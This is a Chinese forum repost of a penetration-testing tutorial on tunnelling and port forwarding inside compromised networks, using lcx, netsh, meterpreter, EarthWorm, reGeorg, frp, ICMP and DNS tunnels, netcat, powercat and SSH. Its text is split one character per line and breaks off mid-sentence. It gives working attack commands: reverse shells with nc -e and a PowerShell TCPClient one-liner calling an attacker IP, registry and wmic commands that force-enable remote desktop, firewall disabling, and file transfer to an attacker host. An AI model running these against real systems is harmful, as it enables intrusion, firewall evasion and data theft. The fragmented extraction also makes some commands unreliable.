论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
渗透测试
[21218] 2020-08-28_内网渗透之常见隧道转发
文档创建者:
s7ckTeam
浏览次数:
1
最后更新:
2025-01-18
渗透测试
1 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-56
6万
主题
-6万
回帖
-56
积分
管理员
积分
-56
发消息
2020-08-28_内网渗透之常见隧道转发
内
网
渗
透
之
常
见
隧
道
转
发
L
e
m
o
n
S
e
c
2
0
2
0
-
0
8
-
2
8
文
章
目
录
内
网
渗
透
之
常
见
隧
道
转
发
一
、
基
本
介
绍
二
、
工
具
介
绍
及
使
用
端
口
转
发
1
、
L
c
x
.
e
x
e
2
、
n
e
t
s
h
3
、
m
s
f
端
口
转
发
内
网
转
发
1
、
E
a
r
t
h
w
o
r
m
2
、
r
e
G
e
o
r
g
+
p
r
o
x
i
f
i
e
r
/
p
r
o
x
y
c
h
a
i
n
s
3
、
f
r
q
隐
藏
隧
道
网
络
层
1
、
i
p
v
6
隧
道
2
、
i
c
m
p
c
2
通
道
及
隧
道
传
输
传
输
层
1
、
n
c
2
、
p
o
w
e
r
c
a
t
应
用
层
1
、
s
s
h
隧
道
2
、
H
T
T
P
/
H
T
T
P
S
隧
道
3
、
D
N
S
隧
道
维
持
后
门
一
、
基
本
介
绍
一
、
基
本
介
绍
端
口
转
发
:
用
于
目
标
机
器
对
某
一
端
口
的
访
问
进
行
了
限
制
,
主
要
就
是
可
以
将
本
机
的
端
口
或
者
是
本
机
可
以
访
问
到
的
任
意
主
机
的
端
口
转
发
到
任
意
一
台
你
需
要
访
问
的
公
网
I
P
上
。
端
口
映
射
:
就
是
将
一
个
内
网
无
法
访
问
的
端
口
映
射
到
公
网
上
的
某
个
端
口
,
进
而
进
行
攻
击
,
例
如
最
喜
欢
的
3
3
8
9
!
内
网
转
发
:
主
要
用
于
在
目
标
机
器
上
做
跳
板
,
进
而
可
以
对
内
网
进
行
攻
击
!
隐
藏
隧
道
:
由
于
防
火
墙
存
在
,
会
检
测
对
外
连
接
情
况
,
如
发
现
异
常
就
会
阻
断
,
隧
道
就
是
绕
过
防
火
墙
,
封
装
数
据
绕
过
屏
蔽
的
通
信
方
式
二
、
工
具
介
绍
及
使
用
二
、
工
具
介
绍
及
使
用
端
口
转
发
端
口
转
发
1
、
L
c
x
.
e
x
e
l
c
x
.
e
x
e
是
一
个
端
口
转
发
映
射
工
具
,
W
i
n
d
o
w
s
版
是
l
c
x
.
e
x
e
,
L
i
n
u
x
版
为
p
o
r
t
m
a
p
,
主
要
就
三
个
参
数
监
听
映
射
转
向
.
W
i
n
d
o
w
s
情
况
下
:
目
标
主
机
执
行
公
网
主
机
监
听
,
即
可
成
功
映
射
如
果
3
3
8
9
被
防
火
墙
限
制
,
可
以
-
t
r
a
n
映
射
到
其
他
端
口
,
进
行
访
问
L
I
N
U
X
情
况
下
:
情
况
下
:
l
c
x
.
e
x
e
-
s
l
a
v
e
公
网
主
机
i
p
8
8
8
8
目
标
i
p
3
3
8
9
l
c
x
.
e
x
e
–
l
i
s
t
e
n
8
8
8
8
5
5
5
5
l
c
x
-
t
r
a
n
6
6
6
6
目
标
i
p
3
3
8
9
目
标
主
机
执
行
公
网
主
机
监
听
,
即
可
成
功
映
射
p
s
:
如
果
目
标
机
器
没
有
开
启
3
3
8
9
?
或
者
找
不
到
远
程
桌
面
?
在
或
者
饿
了
?
算
了
,
先
解
决
前
两
个
问
题
吧
!
2
、
n
e
t
s
h
n
e
t
s
h
(
N
e
t
w
o
r
k
S
h
e
l
l
)
是
一
个
w
i
n
d
o
w
s
系
统
本
身
自
带
的
工
具
,
可
以
用
来
做
端
口
转
发
。
因
为
他
可
以
把
本
地
端
口
的
任
意
一
个
T
C
P
连
接
都
可
以
被
重
定
向
到
另
一
个
端
口
,
或
远
程
计
算
机
的
任
意
端
口
上
。
前
提
:
2
0
0
3
、
x
p
系
统
需
要
安
装
I
P
V
6
(
n
e
t
s
h
i
n
t
e
r
f
a
c
e
i
p
v
6
i
n
s
t
a
l
l
)
,
其
他
版
本
直
接
可
以
使
用
。
启
动
服
务
中
的
I
P
v
6
H
e
l
p
e
r
S
e
r
v
i
c
e
/
I
P
H
e
l
p
e
r
,
如
果
不
行
可
以
关
闭
服
务
器
或
添
加
入
栈
规
则
(
n
e
t
s
h
f
i
r
e
w
a
l
l
s
e
t
o
p
m
o
d
e
d
i
s
a
b
l
e
)
基
本
语
句
.
/
p
o
r
t
m
a
p
-
m
3
-
h
1
目
标
i
p
-
p
1
2
2
-
h
2
公
网
i
p
-
p
2
8
8
8
8
.
/
p
o
r
t
m
a
p
-
m
2
-
p
1
8
8
8
8
-
h
2
公
网
i
p
-
p
2
1
2
3
4
5
开
启
3
3
8
9
端
口
:
通
杀
:
w
m
i
c
R
D
T
O
G
G
L
E
W
H
E
R
E
S
e
r
v
e
r
N
a
m
e
=
'
%
C
O
M
P
U
T
E
R
N
A
M
E
%
'
c
a
l
l
S
e
t
A
l
l
o
w
T
S
C
o
n
n
e
c
t
i
o
n
s
1
2
0
0
3
:
R
E
G
A
D
D
H
K
L
M
S
Y
S
T
E
M
C
u
r
r
e
n
t
C
o
n
t
r
o
l
S
e
t
C
o
n
t
r
o
l
T
e
r
m
i
n
a
l
"
"
S
e
r
v
e
r
/
v
f
D
e
n
y
T
S
C
o
n
n
e
c
t
i
o
n
s
/
t
R
E
G
_
D
W
O
R
D
/
d
0
0
0
0
0
0
0
0
/
f
2
0
0
8
:
R
E
G
A
D
D
H
K
L
M
S
Y
S
T
E
M
C
u
r
r
e
n
t
C
o
n
t
r
o
l
S
e
t
C
o
n
t
r
o
l
T
e
r
m
i
n
a
l
"
"
S
e
r
v
e
r
/
v
f
D
e
n
y
T
S
C
o
n
n
e
c
t
i
o
n
s
/
t
R
E
G
_
D
W
O
R
D
/
d
0
0
0
0
0
0
0
0
/
f
多
版
本
w
i
n
0
8
w
i
n
0
3
w
i
n
7
w
i
n
2
0
1
2
w
i
n
x
p
执
行
3
条
:
1
.
w
m
i
c
/
n
a
m
e
s
p
a
c
e
:
r
o
o
t
c
i
m
v
2
e
r
m
i
n
a
l
s
e
r
v
i
c
e
s
p
a
t
h
w
i
n
3
2
_
t
e
r
m
i
n
a
l
s
e
r
v
i
c
e
s
e
t
t
i
n
g
w
h
e
r
e
(
_
_
C
L
A
S
S
!
=
"
"
)
c
a
l
l
s
e
t
a
l
l
o
w
t
s
c
o
n
n
e
c
t
i
o
n
s
1
2
.
w
m
i
c
/
n
a
m
e
s
p
a
c
e
:
r
o
o
t
c
i
m
v
2
e
r
m
i
n
a
l
s
e
r
v
i
c
e
s
p
a
t
h
w
i
n
3
2
_
t
s
g
e
n
e
r
a
l
s
e
t
t
i
n
g
w
h
e
r
e
(
T
e
r
m
i
n
a
l
N
a
m
e
=
'
R
D
P
-
T
c
p
'
)
c
a
l
l
s
e
t
u
s
e
r
a
u
t
h
e
n
t
i
c
a
t
i
o
n
r
e
q
u
i
r
e
d
1
3
.
r
e
g
a
d
d
"
H
K
L
M
S
Y
S
T
E
M
C
u
r
r
e
n
t
C
o
n
t
r
o
l
S
e
t
C
o
n
t
r
o
l
T
e
r
m
i
n
a
l
S
e
r
v
e
r
"
/
v
f
S
i
n
g
l
e
S
e
s
s
i
o
n
P
e
r
U
s
e
r
/
t
R
E
G
_
D
W
O
R
D
/
d
0
/
f
开
了
远
程
桌
面
找
不
到
?
简
单
暴
力
办
法
看
看
服
务
器
有
木
有
电
话
q
q
之
类
的
,
直
接
联
系
管
理
员
问
问
,
好
好
的
3
3
8
9
端
口
非
得
换
,
不
知
道
我
找
不
到
吗
?
不
闹
了
!
容
易
挨
打
!
1
、
c
m
d
执
行
:
R
E
G
q
u
e
r
y
H
K
L
M
S
Y
S
T
E
M
C
u
r
r
e
n
t
C
o
n
t
r
o
l
S
e
t
C
o
n
t
r
o
l
T
e
r
m
i
n
a
l
"
"
S
e
r
v
e
r
W
i
n
S
t
a
t
i
o
n
s
R
D
P
-
T
c
p
/
v
P
o
r
t
N
u
m
b
e
r
2
、
c
m
d
执
行
:
t
a
s
k
l
i
s
t
/
s
v
c
查
询
T
e
r
m
S
e
r
v
i
c
e
对
应
P
I
D
,
然
后
在
n
e
t
s
t
a
t
-
a
n
o
查
询
的
P
I
D
对
应
的
端
口
号
3
、
查
找
注
册
表
:
H
K
E
Y
_
L
O
C
A
L
_
M
A
C
H
I
N
E
S
Y
S
T
E
M
C
u
r
r
e
n
t
C
o
n
t
r
o
l
S
e
t
C
o
n
t
r
o
l
T
e
r
m
i
n
a
l
S
e
r
v
e
r
W
d
s
d
p
w
d
T
d
s
c
p
中
P
o
r
t
N
u
m
b
e
r
的
值
添
加
n
e
t
s
h
i
n
t
e
r
f
a
c
e
p
o
r
t
p
r
o
x
y
a
d
d
v
4
t
o
v
4
l
i
s
t
e
n
a
d
d
r
e
s
s
=
本
地
l
i
s
t
e
n
p
o
r
t
=
p
o
r
t
c
o
n
n
e
c
t
a
d
d
r
e
s
s
=
i
p
c
o
n
n
e
c
t
p
o
r
t
=
p
o
r
t
删
除
n
e
t
s
h
i
n
t
e
r
f
a
c
e
p
o
r
t
p
r
o
x
y
d
e
l
e
t
e
v
4
t
o
v
4
l
i
s
t
e
n
p
o
r
t
=
p
o
r
t
查
看
n
e
t
s
h
i
n
t
e
r
f
a
c
e
p
o
r
t
p
r
o
x
y
s
h
o
w
a
l
l
举
个
栗
子
,
如
果
想
进
行
端
口
转
发
,
可
以
把
来
自
外
部
的
t
c
p
的
2
6
端
口
流
量
全
部
转
发
到
内
网
的
机
器
的
3
3
8
9
端
口
上
:
3
、
m
s
f
端
口
转
发
m
s
f
的
m
e
t
e
r
p
r
e
t
e
r
内
置
了
端
口
转
发
功
能
,
可
以
把
内
网
的
端
口
转
发
到
本
地
。
然
后
即
可
将
转
发
目
标
主
机
的
3
3
8
9
到
本
地
的
8
8
8
8
,
直
接
连
接
即
可
。
p
o
r
t
f
w
d
l
i
s
t
/
d
e
l
e
t
e
/
f
l
u
s
h
列
表
/
删
除
/
清
空
内
网
转
发
内
网
转
发
内
网
转
发
也
就
是
隧
道
技
术
它
通
常
是
将
一
个
网
络
协
议
封
装
为
另
一
个
网
络
协
议
的
p
a
y
l
o
a
d
。
1
、
E
a
r
t
h
w
o
r
m
E
a
r
t
h
w
o
r
m
是
一
套
便
携
式
的
网
络
穿
透
工
具
,
具
有
S
O
C
K
S
5
代
理
、
端
口
转
发
、
端
口
映
射
等
功
能
,
优
点
比
如
穿
透
能
力
强
,
支
持
多
平
台
等
主
要
三
个
模
块
:
正
向
代
理
s
s
o
c
k
s
d
、
反
向
代
理
r
c
s
o
c
k
s
,
r
s
s
o
c
k
s
端
口
转
发
l
c
x
_
l
i
s
t
e
n
,
l
c
x
_
s
l
a
v
e
,
l
c
x
_
t
r
a
n
首
先
简
单
画
拓
扑
,
利
用
服
务
器
当
作
跳
板
访
问
探
测
内
网
。
比
如
想
通
过
跳
板
机
访
问
内
网
,
也
就
是
正
向
代
理
,
就
是
常
说
的
s
s
,
首
先
在
服
务
器
上
监
听
本
地
端
口
.
/
e
w
_
f
o
r
_
l
i
n
u
x
6
4
-
s
s
s
o
c
k
s
d
-
l
1
0
8
0
,
然
后
在
k
a
l
i
攻
击
机
上
执
行
p
r
o
x
y
c
h
a
i
n
s
+
命
令
即
可
(
在
/
e
t
c
/
p
r
o
x
y
c
h
a
i
n
s
.
c
o
n
f
添
加
s
o
c
k
s
5
2
2
.
2
2
.
2
2
.
2
1
0
8
0
)
在
w
i
n
d
o
w
s
下
直
接
设
置
全
局
代
理
即
可
(
i
e
、
P
r
o
x
i
f
i
e
r
等
)
即
可
访
问
目
标
内
网
服
务
有
正
即
有
反
,
如
果
无
法
直
接
连
接
目
标
主
机
,
但
是
目
标
主
机
可
以
主
动
连
接
攻
击
机
,
这
时
可
以
利
用
e
w
进
行
反
向
代
理
,
只
不
过
方
向
变
了
,
首
先
在
攻
击
机
上
监
听
1
0
8
0
,
将
1
1
1
1
带
你
看
流
量
转
到
1
0
8
0
端
口
#
e
w
_
f
o
r
_
W
i
n
.
e
x
e
-
s
r
c
s
o
c
k
s
-
l
1
0
8
0
-
e
1
1
1
1
,
然
后
在
目
标
机
执
行
e
w
_
f
o
r
_
W
i
n
.
e
x
e
-
s
r
s
s
o
c
k
s
-
d
8
8
.
8
8
.
8
8
.
8
-
e
1
1
1
1
相
当
于
将
流
量
转
发
到
攻
击
机
1
1
1
1
端
口
,
攻
击
者
机
器
通
过
p
r
o
x
y
c
h
a
i
n
s
或
浏
览
器
设
置
S
o
c
k
s
5
代
理
访
问
目
标
内
网
服
务
2
、
r
e
G
e
o
r
g
+
p
r
o
x
i
f
i
e
r
/
p
r
o
x
y
c
h
a
i
n
s
r
e
g
e
o
r
g
主
要
是
把
内
网
服
务
器
的
端
口
通
过
h
t
t
p
/
h
t
t
p
s
隧
道
转
发
到
本
机
。
用
于
目
标
服
务
器
在
内
网
或
做
了
端
口
策
略
的
情
况
下
连
接
目
标
服
务
器
内
部
开
放
端
口
。
它
利
用
w
e
b
s
h
e
l
l
建
立
一
个
s
o
c
k
s
代
理
进
行
内
网
穿
透
,
服
务
器
必
须
支
持
a
s
p
x
、
p
h
p
或
j
s
p
这
些
w
e
b
程
序
中
的
一
种
。
n
e
t
s
h
a
d
v
f
i
r
e
w
a
l
l
f
i
r
e
w
a
l
l
a
d
d
r
u
l
e
n
a
m
e
=
"
8
8
8
8
"
d
i
r
=
i
n
a
c
t
i
o
n
=
a
l
l
o
w
p
r
o
t
o
c
o
l
=
T
C
P
l
o
c
a
l
p
o
r
t
=
2
6
n
e
t
s
h
i
n
t
e
r
f
a
c
e
p
o
r
t
p
r
o
x
y
a
d
d
v
4
t
o
v
4
l
i
s
t
e
n
a
d
d
r
e
s
s
=
i
p
l
i
s
t
e
n
p
o
r
t
=
2
6
c
o
n
n
e
c
t
a
d
d
r
e
s
s
=
1
0
.
0
.
0
.
1
c
o
n
n
e
c
t
p
o
r
t
=
3
3
8
9
p
o
r
t
f
w
d
a
d
d
-
l
8
8
8
8
-
p
3
3
8
9
-
r
1
7
2
.
1
6
.
8
6
.
1
5
3
#
-
l
为
本
地
监
听
端
口
,
-
p
目
标
端
口
,
-
r
目
标
i
p
r
d
e
s
k
t
o
p
1
2
7
.
1
.
1
.
0
:
8
8
8
8
根
据
服
务
器
上
传
相
应
文
件
,
进
行
代
理
,
直
接
访
问
显
示
“
G
e
o
r
g
s
a
y
s
,
‘
A
l
l
s
e
e
m
s
f
i
n
e
’
”
,
代
表
成
功
。
然
后
执
行
,
p
y
t
h
o
n
r
e
G
e
o
r
g
S
o
c
k
s
P
r
o
x
y
.
p
y
-
p
1
0
8
0
-
u
h
t
t
p
:
/
/
1
2
7
.
0
.
0
.
1
/
t
e
s
t
/
t
u
n
n
e
l
.
n
o
s
o
c
k
e
t
.
p
h
p
,
p
r
o
x
i
f
i
e
r
设
置
全
局
代
理
1
0
8
0
即
可
,
p
r
o
x
y
c
h
a
i
n
s
设
置
件
/
e
t
c
/
p
r
o
x
y
c
h
a
i
n
s
.
c
o
n
f
添
加
s
o
c
k
s
5
1
2
7
.
0
.
0
.
1
1
0
8
0
即
可
3
、
f
r
q
f
r
p
是
一
个
可
用
于
内
网
穿
透
的
高
性
能
的
反
向
代
理
应
用
,
支
持
t
c
p
,
u
d
p
,
h
t
t
p
,
h
t
t
p
s
协
议
。
首
先
配
置
对
f
r
p
c
.
i
n
i
,
然
后
和
f
r
p
c
.
e
x
e
一
起
上
传
到
目
标
机
隐
藏
隧
道
隐
藏
隧
道
1
常
见
的
隧
道
:
网
络
层
1
、
i
p
v
6
隧
道
I
P
v
6
协
议
隧
道
方
法
用
于
连
接
处
于
I
P
v
4
海
洋
中
的
各
孤
立
的
I
P
v
6
岛
(
将
I
P
v
4
作
为
隧
道
载
体
,
将
I
P
v
6
报
文
整
体
封
装
在
I
P
v
4
数
据
报
文
中
,
使
I
P
v
6
报
文
整
体
封
装
在
I
P
v
4
数
据
报
文
中
,
使
I
P
v
6
报
文
能
够
穿
过
I
P
v
4
海
洋
,
到
达
另
一
个
I
P
)
。
此
方
法
要
求
隧
道
两
端
的
I
P
v
6
节
点
都
是
双
栈
节
点
(
对
于
I
P
v
4
包
和
I
P
v
6
包
都
使
用
相
同
的
地
址
)
,
即
也
能
够
发
送
I
P
v
4
包
。
I
P
v
6
隧
道
的
工
作
过
程
如
下
:
网
络
层
:
i
p
v
6
隧
道
、
i
c
m
p
隧
道
传
输
层
:
t
c
o
隧
道
、
u
d
p
隧
道
、
端
口
转
发
应
用
层
:
s
s
h
隧
道
、
h
t
t
p
隧
道
、
h
t
t
p
s
隧
道
、
D
N
S
隧
道
1
、
节
点
A
要
向
节
点
B
发
送
I
P
v
6
报
文
,
首
先
需
要
在
节
点
A
和
节
点
B
之
间
建
立
一
条
隧
道
2
、
节
点
A
将
I
P
v
6
报
文
封
装
在
以
节
点
B
的
I
P
v
4
地
址
为
目
的
地
址
,
以
自
己
的
I
P
v
4
地
址
为
源
地
址
的
I
P
v
4
报
文
中
,
并
发
往
I
P
v
4
海
洋
3
、
在
I
P
v
4
海
洋
中
,
这
个
报
文
和
普
通
I
P
v
4
报
文
一
样
,
经
过
I
P
v
4
的
转
发
到
达
节
点
B
4
、
节
点
B
收
到
此
报
文
之
后
,
解
除
I
P
v
4
封
装
,
取
出
其
中
的
I
P
v
6
报
文
配
置
隧
道
和
自
动
隧
道
的
主
要
区
别
在
于
:
只
有
执
行
隧
道
功
能
的
节
点
的
I
P
v
6
地
址
是
I
P
v
4
兼
容
地
址
时
,
自
动
隧
道
才
是
可
行
的
。
在
为
执
行
隧
道
功
能
的
节
点
建
立
I
P
地
址
时
,
自
动
隧
道
方
法
无
需
进
行
配
置
;
而
配
置
隧
道
方
法
则
要
求
隧
道
末
端
节
点
使
用
其
他
机
制
来
获
得
其
I
P
v
4
地
址
,
例
如
采
用
D
H
C
P
、
人
工
配
置
或
其
他
I
P
v
4
的
配
置
机
制
。
支
持
I
P
v
6
的
隧
道
工
具
有
s
o
c
a
t
、
6
t
u
n
n
e
l
、
n
t
6
t
u
n
n
e
l
等
2
、
i
c
m
p
c
2
通
道
及
隧
道
传
输
i
c
m
p
相
当
于
其
他
协
议
更
具
有
隐
蔽
性
,
因
为
防
火
墙
会
默
认
放
此
协
议
,
当
你
拿
到
一
台
服
务
器
,
防
火
墙
禁
止
外
出
流
量
,
可
以
将
数
据
封
装
在
p
i
n
g
中
带
出
,
穿
过
防
火
墙
限
制
。
i
c
m
p
C
2
通
道
i
c
m
p
s
h
是
应
该
利
用
i
c
m
p
反
弹
s
h
e
l
l
1
的
工
具
,
i
c
m
p
s
h
的
目
标
主
机
只
能
是
W
i
n
d
o
w
s
(
不
需
要
管
理
权
限
)
,
控
制
端
只
能
是
L
i
n
u
x
。
控
制
端
k
a
l
i
首
先
下
载
,
并
且
需
要
关
闭
内
核
对
p
i
n
g
的
反
应
,
进
而
执
行
即
可
。
目
标
系
统
w
i
n
d
o
w
s
,
执
行
-
t
即
可
反
弹
s
h
e
l
l
隧
道
传
输
将
T
C
P
连
接
通
过
I
C
M
P
封
装
进
行
传
送
的
一
种
方
法
。
i
c
m
p
t
u
n
n
e
l
是
一
个
将
流
量
封
装
到
I
C
M
P
包
中
的
隧
道
工
具
,
可
以
绕
过
防
火
墙
的
隐
蔽
连
接
。
攻
击
端
首
先
安
装
i
c
m
p
t
u
n
n
e
l
,
然
后
禁
用
i
c
m
p
回
应
影
响
。
然
后
监
听
t
u
n
n
e
l
,
并
且
给
隧
道
接
口
分
配
一
个
I
P
地
址
目
标
关
闭
反
应
,
以
及
连
接
攻
击
i
p
,
设
置
i
p
g
i
t
c
l
o
n
e
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
i
n
q
u
i
s
b
/
i
c
m
p
s
h
.
g
i
t
s
y
s
c
t
l
-
w
n
e
t
.
i
p
v
4
.
i
c
m
p
_
e
c
h
o
_
i
g
n
o
r
e
_
a
l
l
=
1
.
/
i
c
m
p
s
h
_
m
.
p
y
攻
击
者
i
p
目
标
i
p
>
i
c
m
p
s
h
.
e
x
e
-
t
攻
击
者
i
p
g
i
t
c
l
o
n
e
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
j
a
m
e
s
b
a
r
l
o
w
/
i
c
m
p
t
u
n
n
e
l
.
g
i
t
m
a
k
e
s
y
s
c
t
l
-
w
n
e
t
.
i
p
v
4
.
i
c
m
p
_
e
c
h
o
_
i
g
n
o
r
e
_
a
l
l
=
1
.
/
i
c
m
p
t
u
n
n
e
l
-
s
/
s
b
i
n
/
i
f
c
o
n
f
i
g
t
u
n
0
1
0
.
0
.
0
.
1
n
e
t
m
a
s
k
2
5
5
.
2
5
5
.
2
5
5
.
0
s
y
s
c
t
l
-
w
n
e
t
.
i
p
v
4
.
i
c
m
p
_
e
c
h
o
_
i
g
n
o
r
e
_
a
l
l
=
1
.
/
i
c
m
p
t
u
n
n
e
l
攻
击
i
p
/
s
b
i
n
/
i
f
c
o
n
f
i
g
t
u
n
0
1
0
.
0
.
0
.
2
n
e
t
m
a
s
k
2
5
5
.
2
5
5
.
2
5
5
.
0
通
过
I
C
M
P
连
接
S
S
H
(
前
提
目
标
需
开
启
s
s
h
)
,
通
过
I
C
M
P
包
建
立
了
点
对
点
隧
道
。
攻
击
者
的
隧
道
I
P
是
1
0
.
0
.
0
.
1
,
目
标
i
p
的
隧
道
I
P
是
1
0
.
0
.
0
.
2
。
传
输
的
每
个
流
量
都
是
I
C
M
P
包
,
I
C
M
P
的
p
a
y
l
o
a
d
就
是
封
装
的
H
T
T
P
/
I
P
包
,
所
以
走
的
都
是
i
c
m
p
。
传
输
层
1
、
n
c
主
要
通
过
t
c
p
和
u
d
p
的
网
络
连
接
读
取
数
据
等
。
获
取
s
h
e
l
l
正
向
正
向
s
h
e
l
l
:
客
户
端
想
要
获
取
服
务
器
s
h
e
l
l
反
向
反
向
s
h
e
l
l
:
服
务
端
想
要
获
取
客
户
端
器
s
h
e
l
l
场
景
:
攻
击
机
-
>
防
火
墙
-
》
服
务
器
和
数
据
库
同
一
内
网
(
攻
击
可
以
访
问
服
务
器
,
访
问
不
了
数
据
库
)
攻
击
机
监
听
n
c
-
l
v
p
8
8
8
8
数
据
库
n
v
-
l
v
p
8
8
8
8
-
e
/
b
i
n
/
s
h
w
e
b
服
务
器
n
c
-
v
攻
击
i
p
8
8
8
8
-
c
"
n
c
-
v
数
据
库
i
p
8
8
8
8
"
然
后
攻
击
机
即
可
访
问
数
据
库
。
2
、
p
o
w
e
r
c
a
t
P
o
w
e
r
C
a
t
是
N
e
t
C
a
t
的
P
o
w
e
r
S
h
e
l
l
形
式
,
使
用
也
一
样
正
向
连
接
正
向
连
接
:
W
i
n
d
o
w
s
上
反
弹
s
h
e
l
l
到
k
a
l
i
反
向
连
接
反
向
连
接
:
W
i
n
d
o
w
s
上
反
向
连
接
到
k
a
l
i
W
i
n
d
o
w
s
之
间
互
弹
s
h
e
l
l
w
7
监
听
:
w
1
0
连
接
:
o
r
w
7
监
听
:
w
1
0
连
接
:
客
户
端
监
听
n
c
-
l
v
p
8
8
8
8
-
e
/
b
i
n
/
s
h
n
c
-
l
v
p
8
8
8
8
-
e
c
:
w
i
n
d
o
w
s
s
y
s
t
e
m
3
2
c
m
d
.
e
x
e
服
务
端
反
弹
n
c
服
务
端
i
p
8
8
8
8
客
户
端
监
听
n
c
-
l
v
p
8
8
8
8
服
务
端
反
弹
n
c
i
p
8
8
8
8
-
e
/
b
i
n
/
s
h
n
c
i
p
8
8
8
8
-
e
c
:
w
i
n
d
o
w
s
s
y
s
t
e
m
3
2
c
m
d
.
e
x
e
K
a
l
i
:
n
c
-
l
v
p
8
8
8
8
W
i
n
d
o
w
s
:
I
m
p
o
r
t
-
M
o
d
u
l
e
.
p
o
w
e
r
c
a
t
.
p
s
1
p
o
w
e
r
c
a
t
-
c
k
a
l
i
i
p
-
p
8
8
8
8
-
e
c
:
w
i
n
d
o
w
s
s
y
s
t
e
m
3
2
c
m
d
.
e
x
e
K
a
l
i
:
n
c
目
标
i
p
8
8
8
8
-
v
v
W
i
n
d
o
w
s
:
I
m
p
o
r
t
-
M
o
d
u
l
e
.
p
o
w
e
r
c
a
t
.
p
s
1
p
o
w
e
r
c
a
t
-
l
v
p
8
8
8
8
-
e
c
:
w
i
n
d
o
w
s
s
y
s
t
e
m
3
2
c
m
d
.
e
x
e
I
m
p
o
r
t
-
M
o
d
u
l
e
.
p
o
w
e
r
c
a
t
.
p
s
1
p
o
w
e
r
c
a
t
-
l
v
p
8
8
8
8
I
m
p
o
r
t
-
M
o
d
u
l
e
.
p
o
w
e
r
c
a
t
.
p
s
1
p
o
w
e
r
c
a
t
-
c
1
9
2
.
1
6
8
.
1
0
.
1
-
p
8
8
8
8
-
e
p
I
m
p
o
r
t
-
M
o
d
u
l
e
.
p
o
w
e
r
c
a
t
.
p
s
1
p
o
w
e
r
c
a
t
-
l
v
p
8
8
8
8
.
r
e
v
e
r
s
e
.
p
s
1
P
o
w
e
r
c
a
t
传
输
文
件
传
输
文
件
P
o
w
e
r
C
a
t
进
行
进
行
D
N
S
隧
道
通
信
隧
道
通
信
P
o
w
e
r
C
a
t
也
是
一
套
基
于
D
N
S
通
信
的
协
议
,
P
o
w
e
r
C
a
t
的
D
N
S
通
信
是
基
于
d
n
s
c
a
t
然
后
目
标
执
行
然
后
k
a
l
i
执
行
s
e
s
s
i
o
n
-
i
1
即
可
场
景
:
攻
击
机
-
>
防
火
墙
-
》
w
7
和
w
1
0
同
一
内
网
(
攻
击
机
以
w
7
做
跳
板
访
问
w
1
0
)
w
1
0
执
行
w
7
执
行
最
后
k
a
l
i
执
行
,
即
可
访
问
o
r
d
n
s
隧
道
w
7
执
行
k
a
l
i
执
行
w
1
0
执
行
,
即
可
获
取
s
e
s
s
i
o
n
s
-
i
1
应
用
层
1
、
s
s
h
隧
道
常
用
参
数
本
地
转
发
.
r
e
v
e
r
s
e
.
p
s
1
p
s
1
=
$
c
l
i
e
n
t
=
N
e
w
-
O
b
j
e
c
t
S
y
s
t
e
m
.
N
e
t
.
S
o
c
k
e
t
s
.
T
C
P
C
l
i
e
n
t
(
'
1
9
2
.
1
6
8
.
1
0
.
1
'
,
8
8
8
8
)
;
$
s
t
r
e
a
m
=
$
c
l
i
e
n
t
.
G
e
t
S
t
r
e
a
m
(
)
;
[
b
y
t
e
[
]
]
$
b
y
t
e
s
=
0
.
.
6
5
5
3
5
|
%
{
0
}
;
w
h
i
l
e
(
(
$
i
=
$
s
t
r
e
a
m
.
R
e
a
d
(
$
b
y
t
e
s
,
0
,
$
b
y
t
e
s
接
收
端
:
I
m
p
o
r
t
-
M
o
d
u
l
e
.
p
o
w
e
r
c
a
t
.
p
s
1
p
o
w
e
r
c
a
t
-
l
v
p
8
8
8
8
-
o
f
t
e
s
t
.
t
x
t
发
送
端
:
I
m
p
o
r
t
-
M
o
d
u
l
e
.
p
o
w
e
r
c
a
t
.
p
s
1
p
o
w
e
r
c
a
t
-
c
1
9
2
.
1
6
8
.
1
0
.
1
-
p
8
8
8
8
-
i
C
:
U
s
e
r
s
D
e
s
k
t
o
p
t
e
s
t
.
t
x
t
-
v
g
i
t
c
l
o
n
e
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
i
a
g
o
x
8
6
/
d
n
s
c
a
t
2
.
g
i
t
c
d
d
n
s
c
a
t
2
/
s
e
r
v
e
r
/
g
e
m
i
n
s
t
a
l
l
b
u
n
d
l
e
r
b
u
n
d
l
e
i
n
s
t
a
l
l
r
u
b
y
d
n
s
c
a
t
2
.
r
b
t
t
p
o
w
e
r
c
a
t
.
t
e
s
t
-
e
o
p
e
n
-
-
n
o
-
c
a
c
h
e
p
o
w
e
r
c
a
t
-
c
k
a
l
i
i
p
-
p
5
3
-
d
n
s
t
t
p
o
w
e
r
c
a
t
.
t
e
s
t
-
e
c
m
d
.
e
x
e
p
o
w
e
r
c
a
t
-
l
v
p
8
8
8
8
-
e
c
m
d
.
e
x
e
p
o
w
e
r
c
a
t
-
l
v
p
9
9
9
9
-
r
t
c
p
:
i
p
(
w
1
0
)
:
8
8
8
8
n
c
i
p
(
w
7
)
9
9
9
9
-
v
v
p
o
w
e
r
c
a
t
-
l
-
p
9
9
9
9
-
r
d
n
s
:
:
i
p
(
w
7
)
:
:
t
t
p
o
w
e
r
c
a
t
.
t
e
s
t
r
u
b
y
d
n
s
c
a
t
2
.
r
b
t
t
p
o
w
e
r
c
a
t
.
t
e
s
t
-
e
o
p
e
n
-
-
n
o
-
c
a
c
h
e
p
o
w
e
r
c
a
t
-
c
i
p
(
本
机
)
-
p
9
9
9
9
-
v
-
e
c
m
d
.
e
x
e
-
C
压
缩
传
输
-
f
后
台
传
输
-
N
建
立
看
不
到
具
体
会
话
的
连
接
-
L
本
地
端
口
转
发
-
g
允
许
远
程
主
机
连
接
本
地
用
于
转
发
端
口
-
R
将
远
程
主
机
(
服
务
器
)
的
某
个
端
口
转
发
到
本
地
端
指
定
机
器
的
指
定
端
口
-
D
动
态
转
发
(
s
o
c
k
s
代
理
)
-
P
指
定
s
s
h
端
口
将
本
地
机
(
客
户
机
)
的
某
个
端
口
转
发
到
远
端
指
定
机
器
的
指
定
端
口
.
场
景
:
k
a
l
i
-
》
防
火
墙
-
》
w
e
b
服
务
器
-
》
内
网
服
务
器
目
的
:
k
a
l
i
访
问
内
网
服
务
器
3
3
8
9
端
口
思
路
:
以
w
